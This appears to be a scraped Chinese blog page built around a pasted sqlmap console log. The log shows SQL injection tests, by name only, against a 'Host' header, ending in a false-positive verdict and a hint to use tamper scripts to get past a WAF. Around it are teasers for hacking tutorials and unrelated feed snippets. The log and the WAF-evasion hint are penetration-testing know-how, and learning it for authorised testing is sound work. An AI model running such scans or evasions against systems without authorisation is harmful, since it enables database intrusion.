[16:32:32] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[16:32:33] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[16:32:33] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[16:32:34] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[16:32:34] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[16:32:35] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[16:32:35] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[16:32:36] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)'
[16:32:36] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[16:32:37] [INFO] testing 'Oracle error-based - ORDER BY, GROUP BY clause'
[16:32:38] [INFO] testing 'Firebird error-based - ORDER BY clause'
[16:32:38] [INFO] testing 'IBM DB2 error-based - ORDER BY clause'
[16:32:39] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:32:43] [INFO] testing 'Generic inline queries'
[16:32:43] [INFO] testing 'MySQL inline queries'
[16:32:43] [INFO] testing 'PostgreSQL inline queries'
[16:32:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:32:43] [INFO] testing 'Oracle inline queries'
[16:32:44] [INFO] testing 'SQLite inline queries'
[16:32:44] [INFO] testing 'Firebird inline queries'
[16:32:44] [INFO] testing 'ClickHouse inline queries'
[16:32:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:32:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:32:54] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:32:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:33:03] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[16:33:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[16:33:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:33:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:33:21] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[16:33:25] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[16:33:30] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[16:33:34] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[16:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:33:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:33:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:33:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE)'
[16:33:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:34:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[16:34:06] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[16:34:10] [INFO] testing 'Oracle stacked queries (heavy query)'
[16:34:15] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[16:34:19] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[16:34:24] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[16:34:24] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[16:34:24] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[16:34:28] [INFO] testing 'IBM DB2 stacked queries (heavy query)'
[16:34:33] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[16:34:37] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[16:34:43] [INFO] testing 'Firebird stacked queries (heavy query - comment)'
[16:34:47] [INFO] testing 'Firebird stacked queries (heavy query)'
[16:34:53] [INFO] testing 'SAP MaxDB stacked queries (heavy query - comment)'
[16:34:56] [INFO] testing 'SAP MaxDB stacked queries (heavy query)'
[16:35:02] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[16:35:05] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[16:35:11] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[16:35:14] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query)'
[16:35:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:35:27] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[16:35:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[16:35:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[16:35:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[16:35:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[16:35:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[16:36:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[16:36:08] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[16:36:16] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[16:36:23] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[16:36:31] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[16:36:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[16:36:44] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[16:36:48] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[16:36:53] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[16:36:58] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[16:37:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[16:37:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[16:37:24] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[16:37:29] [INFO] testing 'MySQL AND time-based blind (ELT)'
[16:37:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:37:53] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:37:58] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:38:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:38:15] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[16:38:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[16:38:30] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[16:38:35] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[16:38:43] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[16:38:50] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[16:38:55] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[16:39:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:39:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF - comment)'
[16:39:13] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[16:39:22] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[16:39:29] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[16:39:35] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)'
[16:39:40] [INFO] testing 'Oracle AND time-based blind'
[16:39:48] [INFO] testing 'Oracle OR time-based blind'
[16:39:55] [INFO] testing 'Oracle AND time-based blind (comment)'
[16:40:01] [INFO] testing 'Oracle OR time-based blind (comment)'
[16:40:06] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[16:40:14] [INFO] testing 'Oracle OR time-based blind (heavy query)'
[16:40:22] [INFO] testing 'Oracle AND time-based blind (heavy query - comment)'
[16:40:28] [INFO] testing 'Oracle OR time-based blind (heavy query - comment)'
[16:40:35] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'
[16:40:44] [INFO] testing 'IBM DB2 OR time-based blind (heavy query)'
[16:40:54] [INFO] testing 'IBM DB2 AND time-based blind (heavy query - comment)'
[16:40:59] [INFO] testing 'IBM DB2 OR time-based blind (heavy query - comment)'
[16:41:04] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[16:41:12] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[16:41:19] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
[16:41:24] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
[16:41:29] [INFO] testing 'Firebird >= 2.0 AND time-based blind (heavy query)'
[16:41:36] [INFO] testing 'Firebird >= 2.0 OR time-based blind (heavy query)'
[16:41:44] [INFO] testing 'Firebird >= 2.0 AND time-based blind (heavy query - comment)'
[16:41:49] [INFO] testing 'Firebird >= 2.0 OR time-based blind (heavy query - comment)'
[16:41:54] [INFO] testing 'SAP MaxDB AND time-based blind (heavy query)'
[16:42:02] [INFO] testing 'SAP MaxDB OR time-based blind (heavy query)'
[16:42:09] [INFO] testing 'SAP MaxDB AND time-based blind (heavy query - comment)'
[16:42:13] [INFO] parameter 'Host' appears to be 'SAP MaxDB AND time-based blind (heavy query - comment)' injectable
it looks like the back-end DBMS is 'SAP MaxDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[16:58:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:58:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:58:28] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[16:58:32] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[16:58:36] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[16:58:40] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[16:58:44] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[16:58:48] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[16:58:52] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[16:58:58] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[16:59:01] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[16:59:04] [INFO] checking if the injection point on Host parameter 'Host' is a false positive
[16:59:04] [WARNING] false positive or unexploitable injection point detected
[16:59:04] [WARNING] parameter 'Host' does not seem to be injectable
[16:59:04] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[*] ending @ 16:59:04 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>
為什麼會看到廣告
28會員
48Content count
人工智能工作經驗跟研究
留言0
查看全部
發表第一個留言支持創作者!
一個網站可能除了首頁以外還會有其他的相關網站 例如/admin ,login/ ,home.php ,/root/等等 但是又不一定於是互聯網上就有一些words清單 像是 裡面就有存放各種可能的目錄名稱 例如給定一個網址在網址尾端增加/admin"有可能"就會連到後台 但是人手工一個一個去試去猜實
在Microsoft store 搜尋 kail linux 並安裝(這裡假設你已經先安裝WSL) 之後執行kail linux 終端機 依序輸入以下指令: 上面主要是做一些更新(update and upgrade),然後安裝python3, python3-venv(虛擬環境)之後建立一個名為b
社交工程是歷史上一些最大的黑客攻擊的關鍵手段! 許多新手黑客過於專注於掌握黑客的技術方面,以至於他們忽視了社交工程的力量,這會給他們帶來危險。 當俄羅斯的 Sandworm 黑客團隊(技術最先進的黑客組織之一) 使用社會工程入侵烏克蘭的電網和美國 2016 年總統大選, 這顯示出了社交工程的重要性
sqlmap是一個python的滲透測試工具 SQL 注入 **SQL 注入(SQL injection)**利用了網路程式(Web apps)的錯誤輸入。駭客可以透過執行後端資料庫的網路程式,惡意繞過 SQL 指令。 SQL 注入能在未授權的情況下,直接從資料庫訪問資料庫與檢索信息。許多數據洩露肇
一個網站可能除了首頁以外還會有其他的相關網站 例如/admin ,login/ ,home.php ,/root/等等 但是又不一定於是互聯網上就有一些words清單 像是 裡面就有存放各種可能的目錄名稱 例如給定一個網址在網址尾端增加/admin"有可能"就會連到後台 但是人手工一個一個去試去猜實
在Microsoft store 搜尋 kail linux 並安裝(這裡假設你已經先安裝WSL) 之後執行kail linux 終端機 依序輸入以下指令: 上面主要是做一些更新(update and upgrade),然後安裝python3, python3-venv(虛擬環境)之後建立一個名為b
社交工程是歷史上一些最大的黑客攻擊的關鍵手段! 許多新手黑客過於專注於掌握黑客的技術方面,以至於他們忽視了社交工程的力量,這會給他們帶來危險。 當俄羅斯的 Sandworm 黑客團隊(技術最先進的黑客組織之一) 使用社會工程入侵烏克蘭的電網和美國 2016 年總統大選, 這顯示出了社交工程的重要性
sqlmap是一個python的滲透測試工具 SQL 注入 **SQL 注入(SQL injection)**利用了網路程式(Web apps)的錯誤輸入。駭客可以透過執行後端資料庫的網路程式,惡意繞過 SQL 指令。 SQL 注入能在未授權的情況下,直接從資料庫訪問資料庫與檢索信息。許多數據洩露肇
你可能也想看
Thumbnail
重點摘要: 1.9 月降息 2 碼、進一步暗示年內還有 50 bp 降息 2.SEP 上修失業率預期,但快速的降息速率將有助失業率觸頂 3.未來幾個月經濟數據將繼續轉弱,經濟復甦的時點或是 1Q25 季底附近
Thumbnail
近期的「貼文發佈流程 & 版型大更新」功能大家使用了嗎? 新版式整體視覺上「更加凸顯圖片」,為了搭配這次的更新,我們推出首次貼文策展 ❤️ 使用貼文功能並完成這次的指定任務,還有機會獲得富士即可拍,讓你的美好回憶都可以用即可拍珍藏!
Thumbnail
雖然不是每個人都喜歡或適合一個人過生活,但是要自在快樂地過獨居生活絕對有方法,但是也要預作準備與練習,不然等到因各種措手不及的意外發生,被迫獨居而成宅男廢女或獨居老人就慘了
Thumbnail
後來的我們,都像在對答案,連曖昧了暈船了熱戀了不愛了,都能找首歌對詞入座。
Thumbnail
當很執著於一個點時,就很容易陷入自己的盲點中。 沒有放大檢視,只是一直在點中打轉,搞到自己內耗,又失去成就感,這時候就頗需要靈魂出竅一下,看看執著的自己到底在糾結哪一點。 關於之前整理衣櫥時,已經整理掉一個衣櫥的衣服,現下,卻覺得上班不糾結,可糾結在下班後,前篇才在討論 “ 挑衣服 ” ,這後面
Thumbnail
七星潭周邊的產業可否串連?消費行為數據以及觀光數據等等,都是指標。 花蓮幅員大,便利商店很遠,口渴沒辦法買水,就直接開車離開。 連結花蓮的地方特色,例如一杯水?一種在地食物?花蓮地方意象融入食物、包裝和店面設計。識別度要高,若要凸顯七星潭,它和其他海洋有什麼不一樣?如果用更多在地的食材、產品,去
Thumbnail
這篇文章介紹了作者過去不知如何表達自己的感受,以及如今希望能和他人一起練習善意的表達感受。同時提到了理解行為的重要性,並強調用善意的方式去理解對方的感受。
Thumbnail
騎車在外的路上一個閃失都有可能造成意外的發生,然而就再前天的一個路口,因後方車輛要超車而差點發生車禍,好在我預先看後視鏡才避免掉有可能發生的意外,其實騎車最怕大意,以為的沒問題的路況卻給你來個突而其來的變化,但那天在接近意外發生一個觀看後視鏡的動作甚至可以說是我一命,雖說這個動作是我的一個習慣,但不
Thumbnail
這個很難~!然而放下一切,確實讓人輕省許多。
練習 小時候常看NBA,喬丹的罰球線灌籃,艾佛森的過人,天勾的賈霸,我看了看覺得這些動作實在難倒我 於是我上了戰場,找了同學來鬥牛,但我發現我灌不到籃,過人時人是過了,球卻還在原地,試著用天勾,結果卻一球砸在同學臉上 我很懊悔,覺得我看了那麼久的籃球了為何還不會,明明很簡單啊,後來我找到了適合自己的
Thumbnail
偌大的鏡前佇立,簡單合身的黑色棉衫和運動短褲,一雙米色的襪子穿到腳踝上十公分的位置,給予溫暖和保護。黑如緞面的短髮落至頸間,用髮圈隨性紮著瀏海,是張稍顯稚氣的圓臉。
Thumbnail
重點摘要: 1.9 月降息 2 碼、進一步暗示年內還有 50 bp 降息 2.SEP 上修失業率預期,但快速的降息速率將有助失業率觸頂 3.未來幾個月經濟數據將繼續轉弱,經濟復甦的時點或是 1Q25 季底附近
Thumbnail
近期的「貼文發佈流程 & 版型大更新」功能大家使用了嗎? 新版式整體視覺上「更加凸顯圖片」,為了搭配這次的更新,我們推出首次貼文策展 ❤️ 使用貼文功能並完成這次的指定任務,還有機會獲得富士即可拍,讓你的美好回憶都可以用即可拍珍藏!
Thumbnail
雖然不是每個人都喜歡或適合一個人過生活,但是要自在快樂地過獨居生活絕對有方法,但是也要預作準備與練習,不然等到因各種措手不及的意外發生,被迫獨居而成宅男廢女或獨居老人就慘了
Thumbnail
後來的我們,都像在對答案,連曖昧了暈船了熱戀了不愛了,都能找首歌對詞入座。
Thumbnail
當很執著於一個點時,就很容易陷入自己的盲點中。 沒有放大檢視,只是一直在點中打轉,搞到自己內耗,又失去成就感,這時候就頗需要靈魂出竅一下,看看執著的自己到底在糾結哪一點。 關於之前整理衣櫥時,已經整理掉一個衣櫥的衣服,現下,卻覺得上班不糾結,可糾結在下班後,前篇才在討論 “ 挑衣服 ” ,這後面
Thumbnail
七星潭周邊的產業可否串連?消費行為數據以及觀光數據等等,都是指標。 花蓮幅員大,便利商店很遠,口渴沒辦法買水,就直接開車離開。 連結花蓮的地方特色,例如一杯水?一種在地食物?花蓮地方意象融入食物、包裝和店面設計。識別度要高,若要凸顯七星潭,它和其他海洋有什麼不一樣?如果用更多在地的食材、產品,去
Thumbnail
這篇文章介紹了作者過去不知如何表達自己的感受,以及如今希望能和他人一起練習善意的表達感受。同時提到了理解行為的重要性,並強調用善意的方式去理解對方的感受。
Thumbnail
騎車在外的路上一個閃失都有可能造成意外的發生,然而就再前天的一個路口,因後方車輛要超車而差點發生車禍,好在我預先看後視鏡才避免掉有可能發生的意外,其實騎車最怕大意,以為的沒問題的路況卻給你來個突而其來的變化,但那天在接近意外發生一個觀看後視鏡的動作甚至可以說是我一命,雖說這個動作是我的一個習慣,但不
Thumbnail
這個很難~!然而放下一切,確實讓人輕省許多。
練習 小時候常看NBA,喬丹的罰球線灌籃,艾佛森的過人,天勾的賈霸,我看了看覺得這些動作實在難倒我 於是我上了戰場,找了同學來鬥牛,但我發現我灌不到籃,過人時人是過了,球卻還在原地,試著用天勾,結果卻一球砸在同學臉上 我很懊悔,覺得我看了那麼久的籃球了為何還不會,明明很簡單啊,後來我找到了適合自己的
Thumbnail
偌大的鏡前佇立,簡單合身的黑色棉衫和運動短褲,一雙米色的襪子穿到腳踝上十公分的位置,給予溫暖和保護。黑如緞面的短髮落至頸間,用髮圈隨性紮著瀏海,是張稍顯稚氣的圓臉。